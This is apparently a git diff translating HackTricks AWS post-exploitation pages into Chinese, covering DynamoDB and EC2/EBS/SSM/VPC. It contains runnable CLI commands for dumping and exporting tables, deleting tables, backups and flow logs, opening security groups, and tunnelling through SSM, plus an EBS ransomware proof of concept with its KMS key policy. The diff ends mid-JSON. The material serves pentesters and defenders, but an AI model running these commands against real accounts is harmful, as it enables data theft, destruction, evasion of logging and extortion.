information in the table +**潜在影响:** 通过定位表中的敏感信息进行间接权限提升 ### `dynamodb:Query` -**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request. 
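In all of the item-level calls in this section the primary-key attribute names are needed first. A quick sketch of how they can be recovered from the table metadata (assuming `dynamodb:ListTables` / `dynamodb:DescribeTable` are also granted; `ProductCatalog` is the example table used above):
```bash
# List table names, then dump the key schema (primary key attribute names) of a target table
aws dynamodb list-tables
aws dynamodb describe-table --table-name ProductCatalog --query "Table.KeySchema"
```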
+**与之前的权限类似,** 这项权限允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值。它允许使用[比较子集](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html),但唯一允许与主键(必须出现)进行的比较是 "EQ",因此您无法使用比较在请求中获取整个数据库。 {{#tabs }} {{#tab name="json file" }} - ```bash aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json - // With a.json - { +// With a.json +{ "Id" : { - "ComparisonOperator":"EQ", - "AttributeValueList": [ {"N": "205"} ] - } +"ComparisonOperator":"EQ", +"AttributeValueList": [ {"N": "205"} ] +} } ``` - {{#endtab }} {{#tab name="inline" }} - ```bash aws dynamodb query \ - --table-name TargetTable \ - --key-condition-expression "AttributeName = :value" \ - --expression-attribute-values '{":value":{"S":"TargetValue"}}' \ - --region +--table-name TargetTable \ +--key-condition-expression "AttributeName = :value" \ +--expression-attribute-values '{":value":{"S":"TargetValue"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过定位表中的敏感信息进行间接权限提升 ### `dynamodb:Scan` -You can use this permission to **dump the entire table easily**. - +您可以使用此权限**轻松导出整个表**。 ```bash aws dynamodb scan --table-name #Get data inside the table ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:PartiQLSelect` -You can use this permission to **dump the entire table easily**. - +您可以使用此权限来**轻松导出整个表**。 ```bash aws dynamodb execute-statement \ - --statement "SELECT * FROM ProductCatalog" +--statement "SELECT * FROM ProductCatalog" ``` - -This permission also allow to perform `batch-execute-statement` like: - +此权限还允许执行 `batch-execute-statement`,例如: ```bash aws dynamodb batch-execute-statement \ - --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]' +--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]' ``` +但您需要指定主键及其值,因此这并不是很有用。 -but you need to specify the primary key with a value, so it isn't that useful. 
- -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)` -This permission will allow an attacker to **export the whole table to a S3 bucket** of his election: - +此权限将允许攻击者**将整个表导出到他选择的 S3 存储桶**: ```bash aws dynamodb export-table-to-point-in-time \ - --table-arn arn:aws:dynamodb:::table/TargetTable \ - --s3-bucket \ - --s3-prefix \ - --export-time \ - --region +--table-arn arn:aws:dynamodb:::table/TargetTable \ +--s3-bucket \ +--s3-prefix \ +--export-time \ +--region ``` - -Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with: - +注意,要使其工作,表需要启用时间点恢复,你可以通过以下方式检查表是否启用: ```bash aws dynamodb describe-continuous-backups \ - --table-name +--table-name ``` - -If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission: - +如果它没有启用,您需要**启用它**,为此您需要**`dynamodb:ExportTableToPointInTime`**权限: ```bash aws dynamodb update-continuous-backups \ - --table-name \ - --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true +--table-name \ +--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)` -With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table. - +拥有这些权限后,攻击者将能够**从备份中创建新表**(甚至可以创建备份,然后在不同的表中恢复它)。然后,凭借必要的权限,他将能够检查**信息**,这些信息**可能不再在生产**表中。 ```bash aws dynamodb restore-table-from-backup \ - --backup-arn \ - --target-table-name \ - --region +--backup-arn \ +--target-table-name \ +--region ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the table backup +**潜在影响:** 通过定位表备份中的敏感信息进行间接权限提升 ### `dynamodb:PutItem` -This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**. 
+此权限允许用户**向表中添加新项或用新项替换现有项**。如果具有相同主键的项已经存在,**整个项将被新项替换**。如果主键不存在,将**创建**一个具有指定主键的新项。 {{#tabs }} {{#tab name="XSS Example" }} - ```bash ## Create new item with XSS payload aws dynamodb put-item --table --item file://add.json ### With add.json: { - "Id": { - "S": "1000" - }, - "Name": { - "S": "Marc" - }, - "Description": { - "S": "" - } +"Id": { +"S": "1000" +}, +"Name": { +"S": "Marc" +}, +"Description": { +"S": "" +} } ``` - {{#endtab }} -{{#tab name="AI Example" }} - +{{#tab name="AI 示例" }} ```bash aws dynamodb put-item \ - --table-name ExampleTable \ - --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ - --region +--table-name ExampleTable \ +--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table +**潜在影响:** 通过能够在DynamoDB表中添加/修改数据,利用进一步的漏洞/绕过 ### `dynamodb:UpdateItem` -This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression. +此权限允许用户**修改项目的现有属性或向项目添加新属性**。它并**不替换**整个项目;它仅更新指定的属性。如果主键在表中不存在,则该操作将**创建一个新项目**,并使用指定的主键设置更新表达式中指定的属性。 {{#tabs }} {{#tab name="XSS Example" }} - ```bash ## Update item with XSS payload aws dynamodb update-item --table \ - --key file://key.json --update-expression "SET Description = :value" \ - --expression-attribute-values file://val.json +--key file://key.json --update-expression "SET Description = :value" \ +--expression-attribute-values file://val.json ### With key.json: { - "Id": { - "S": "1000" - } +"Id": { +"S": "1000" +} } ### and val.json { - ":value": { - "S": "" - } +":value": { +"S": "" +} } ``` - {{#endtab }} -{{#tab name="AI Example" }} - +{{#tab name="AI 示例" }} ```bash aws dynamodb update-item \ - --table-name ExampleTable \ - --key '{"Id": {"S": "1"}}' \ - --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \ - --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ - --region +--table-name ExampleTable \ +--key '{"Id": {"S": "1"}}' \ +--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \ +--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table +**潜在影响:** 通过能够在DynamoDB表中添加/修改数据,利用进一步的漏洞/绕过。 ### `dynamodb:DeleteTable` -An attacker with this permission can **delete a DynamoDB table, causing data loss**. - +拥有此权限的攻击者可以**删除DynamoDB表,导致数据丢失**。 ```bash aws dynamodb delete-table \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region ``` - -**Potential impact**: Data loss and disruption of services relying on the deleted table. +**潜在影响**:数据丢失和依赖于已删除表的服务中断。 ### `dynamodb:DeleteBackup` -An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**. 
- +拥有此权限的攻击者可以**删除DynamoDB备份,可能导致在灾难恢复场景中数据丢失**。 ```bash aws dynamodb delete-backup \ - --backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \ - --region +--backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \ +--region ``` - -**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario. +**潜在影响**:数据丢失以及在灾难恢复场景中无法从备份中恢复。 ### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords` > [!NOTE] -> TODO: Test if this actually works +> TODO: 测试这是否真的有效 -An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage. - -1. Enable a stream on a DynamoDB table: +拥有这些权限的攻击者可以**在DynamoDB表上启用流,更新表以开始流式传输更改,然后访问流以实时监控表的更改**。这使攻击者能够监控和提取数据更改,可能导致数据泄露。 +1. 在DynamoDB表上启用流: ```bash bashCopy codeaws dynamodb update-table \ - --table-name TargetTable \ - --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \ - --region +--table-name TargetTable \ +--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \ +--region ``` - -2. Describe the stream to obtain the ARN and other details: - +2. 描述获取 ARN 和其他详细信息的流: ```bash bashCopy codeaws dynamodb describe-stream \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region ``` - -3. Get the shard iterator using the stream ARN: - +3. 使用流 ARN 获取分片迭代器: ```bash bashCopy codeaws dynamodbstreams get-shard-iterator \ - --stream-arn \ - --shard-id \ - --shard-iterator-type LATEST \ - --region +--stream-arn \ +--shard-id \ +--shard-iterator-type LATEST \ +--region ``` - -4. Use the shard iterator to access and exfiltrate data from the stream: - +4. 使用分片迭代器访问并提取流中的数据: ```bash bashCopy codeaws dynamodbstreams get-records \ - --shard-iterator \ - --region +--shard-iterator \ +--region ``` - -**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes. 
+**潜在影响**:对DynamoDB表更改的实时监控和数据泄露。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index 9ae6a0a4f..f2068462f 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -1,30 +1,29 @@ -# AWS - EC2, EBS, SSM & VPC Post Exploitation +# AWS - EC2, EBS, SSM & VPC 后期利用 {{#include ../../../../banners/hacktricks-training.md}} ## EC2 & VPC -For more information check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` +### **恶意 VPC 镜像 -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` -VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\ -An attacker could abuse this to capture all the traffic and obtain sensitive information from it: +VPC 流量镜像 **在 VPC 内复制 EC2 实例的入站和出站流量**,无需在实例上安装任何东西。这些复制的流量通常会发送到网络入侵检测系统 (IDS) 进行分析和监控。\ +攻击者可以利用这一点捕获所有流量并从中获取敏感信息: -For more information check this page: +有关更多信息,请查看此页面: {{#ref}} aws-malicious-vpc-mirror.md {{#endref}} -### Copy Running Instance - -Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**: +### 复制运行实例 +实例通常包含某种敏感信息。有不同的方法可以进入(查看 [EC2 权限提升技巧](../../aws-privilege-escalation/aws-ec2-privesc.md))。然而,检查其内容的另一种方法是 **创建一个 AMI 并从中运行一个新实例(甚至在您自己的账户中)**: ```shell # List instances aws ec2 describe-images @@ -48,211 +47,192 @@ aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups " aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 ``` +### EBS 快照转储 -### EBS Snapshot dump - -**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\ -If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account: +**快照是卷的备份**,通常会包含 **敏感信息**,因此检查它们应该会披露这些信息。\ +如果你发现一个 **没有快照的卷**,你可以:**创建一个快照** 并执行以下操作,或者直接 **在账户内的实例中挂载它**: {{#ref}} aws-ebs-snapshot-dump.md {{#endref}} -### Data Exfiltration +### 数据外泄 -#### DNS Exfiltration +#### DNS 外泄 -Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**. 
+即使你锁定了 EC2,使其无法发送流量,它仍然可以通过 **DNS 外泄**。 -- **VPC Flow Logs will not record this**. -- You have no access to AWS DNS logs. -- Disable this by setting "enableDnsSupport" to false with: +- **VPC 流日志不会记录此内容**。 +- 你无法访问 AWS DNS 日志。 +- 通过将 "enableDnsSupport" 设置为 false 来禁用此功能: - `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` +`aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` -#### Exfiltration via API calls +#### 通过 API 调用外泄 -An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs. +攻击者可以调用由他控制的账户的 API 端点。Cloudtrail 将记录这些调用,攻击者将能够在 Cloudtrail 日志中看到外泄的数据。 -### Open Security Group - -You could get further access to network services by opening ports like this: +### 开放安全组 +你可以通过打开端口来进一步访问网络服务,如下所示: ```bash aws ec2 authorize-security-group-ingress --group-id --protocol tcp --port 80 --cidr 0.0.0.0/0 # Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC ``` - ### Privesc to ECS -It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data. +可以运行一个 EC2 实例并将其注册为用于运行 ECS 实例,然后窃取 ECS 实例的数据。 -For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs). +有关更多信息,请查看[**此处**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs)。 ### Remove VPC flow logs - ```bash aws ec2 delete-flow-logs --flow-log-ids --region ``` +### SSM 端口转发 -### SSM Port Forwarding - -Required permissions: +所需权限: - `ssm:StartSession` -In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs. -One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster. +除了命令执行,SSM 还允许流量隧道,这可以被滥用以从由于安全组或 NACL 而没有网络访问的 EC2 实例进行转发。 +其中一个有用的场景是从 [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) 转发到私有 EKS 集群。 -> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html - -1. Install the SessionManagerPlugin on your machine -2. Log in to the Bastion EC2 using the following command: +> 为了开始会话,您需要安装 SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html +1. 在您的机器上安装 SessionManagerPlugin +2. 使用以下命令登录到 Bastion EC2: ```shell aws ssm start-session --target "$INSTANCE_ID" ``` - -3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script -4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile -5. Log in to EKS as the Bastion EC2: - +3. 使用 [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) 脚本获取 Bastion EC2 AWS 临时凭证 +4. 将凭证转移到您自己的机器中的 `$HOME/.aws/credentials` 文件,作为 `[bastion-ec2]` 配置文件 +5. 以 Bastion EC2 身份登录 EKS: ```shell aws eks update-kubeconfig --profile bastion-ec2 --region --name ``` - -6. Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost` -7. 
Create an SSM tunnel as follows: - +6. 更新 `$HOME/.kube/config` 文件中的 `server` 字段,指向 `https://localhost` +7. 创建一个 SSM 隧道,如下所示: ```shell sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":[""],"portNumber":["443"], "localPortNumber":["443"]}' --region ``` - -8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running: - +8. 现在,来自 `kubectl` 工具的流量通过 Bastion EC2 通过 SSM 隧道转发,您可以通过运行以下命令从自己的机器访问私有 EKS 集群: ```shell kubectl get pods --insecure-skip-tls-verify ``` +注意,SSL 连接将失败,除非您设置 `--insecure-skip-tls-verify` 标志(或其在 K8s 审计工具中的等效项)。由于流量通过安全的 AWS SSM 隧道进行隧道传输,您可以免受任何类型的中间人攻击。 -Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks. - -Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. - -### Share AMI +最后,这种技术并不特定于攻击私有 EKS 集群。您可以设置任意域和端口,以便转向任何其他 AWS 服务或自定义应用程序。 +### 分享 AMI ```bash aws ec2 modify-image-attribute --image-id --launch-permission "Add=[{UserId=}]" --region ``` +### 在公共和私有 AMI 中搜索敏感信息 -### Search sensitive information in public and private AMIs - -- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. - -### Share EBS Snapshot +- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel 是一个旨在 **在公共或私有 Amazon Machine Images (AMIs) 中搜索敏感信息** 的工具。它自动化了从目标 AMI 启动实例、挂载其卷以及扫描潜在秘密或敏感数据的过程。 +### 共享 EBS 快照 ```bash aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-permission "Add=[{UserId=}]" --region ``` - ### EBS Ransomware PoC -A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it. - -First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. Change the key policy to allow for any AWS account Principal to use the key. 
For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption' +一个类似于在 S3 后渗透笔记中演示的勒索软件演示的概念验证。KMS 应该被重新命名为 RMS(勒索软件管理服务),因为使用它加密各种 AWS 服务是如此简单。 +首先,从一个“攻击者”的 AWS 账户中,在 KMS 中创建一个客户管理的密钥。在这个例子中,我们将让 AWS 为我管理密钥数据,但在现实场景中,恶意行为者会将密钥数据保留在 AWS 控制之外。更改密钥策略以允许任何 AWS 账户主体使用该密钥。对于这个密钥策略,账户的名称是 'AttackSim',允许所有访问的策略规则称为 'Outside Encryption'。 ``` { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Outside Encryption", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey", - "kms:GenerateDataKeyWithoutPlainText", - "kms:CreateGrant" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:CreateGrant", - "kms:ListGrants", - "kms:RevokeGrant" - ], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow access for Key Administrators", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Create*", +"kms:Describe*", +"kms:Enable*", +"kms:List*", +"kms:Put*", +"kms:Update*", +"kms:Revoke*", +"kms:Disable*", +"kms:Get*", +"kms:Delete*", +"kms:TagResource", +"kms:UntagResource", +"kms:ScheduleKeyDeletion", +"kms:CancelKeyDeletion" +], +"Resource": "*" +}, +{ +"Sid": "Allow use of the key", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*" +}, +{ +"Sid": "Outside Encryption", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey", +"kms:GenerateDataKeyWithoutPlainText", +"kms:CreateGrant" +], +"Resource": "*" +}, +{ +"Sid": "Allow attachment of persistent resources", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:CreateGrant", +"kms:ListGrants", +"kms:RevokeGrant" +], +"Resource": "*", +"Condition": { +"Bool": { 
+"kms:GrantIsForAWSResource": "true" +} +} +} +] } ``` - -The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume: +密钥策略规则需要启用以下内容,以便能够使用它来加密 EBS 卷: - `kms:CreateGrant` - `kms:Decrypt` @@ -260,222 +240,214 @@ The key policy rule needs the following enabled to allow for the ability to use - `kms:GenerateDataKeyWithoutPlainText` - `kms:ReEncrypt` -Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account. +现在可以使用公开可访问的密钥。我们可以使用一个“受害者”账户,该账户有一些 EC2 实例启动,并附加了未加密的 EBS 卷。这个“受害者”账户的 EBS 卷是我们加密的目标,这次攻击是在假设高权限 AWS 账户被攻破的情况下进行的。 ![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459) -Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e) +类似于 S3 勒索软件的例子。这次攻击将使用快照创建附加 EBS 卷的副本,使用“攻击者”账户中的公开可用密钥加密新的 EBS 卷,然后从 EC2 实例中分离并删除原始 EBS 卷,最后删除用于创建新加密 EBS 卷的快照。 ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e) -This results in only encrypted EBS volumes left available in the account. +这导致账户中只剩下加密的 EBS 卷。 ![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220) -Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now. +还值得注意的是,脚本停止了 EC2 实例,以分离和删除原始 EBS 卷。原始未加密的卷现在已经消失。 ![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e) -Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy. 
- +接下来,返回“攻击者”账户中的密钥策略,并从密钥策略中删除“外部加密”策略规则。 ```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow access for Key Administrators", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Create*", +"kms:Describe*", +"kms:Enable*", +"kms:List*", +"kms:Put*", +"kms:Update*", +"kms:Revoke*", +"kms:Disable*", +"kms:Get*", +"kms:Delete*", +"kms:TagResource", +"kms:UntagResource", +"kms:ScheduleKeyDeletion", +"kms:CancelKeyDeletion" +], +"Resource": "*" +}, +{ +"Sid": "Allow use of the key", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*" +}, +{ +"Sid": "Allow attachment of persistent resources", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your 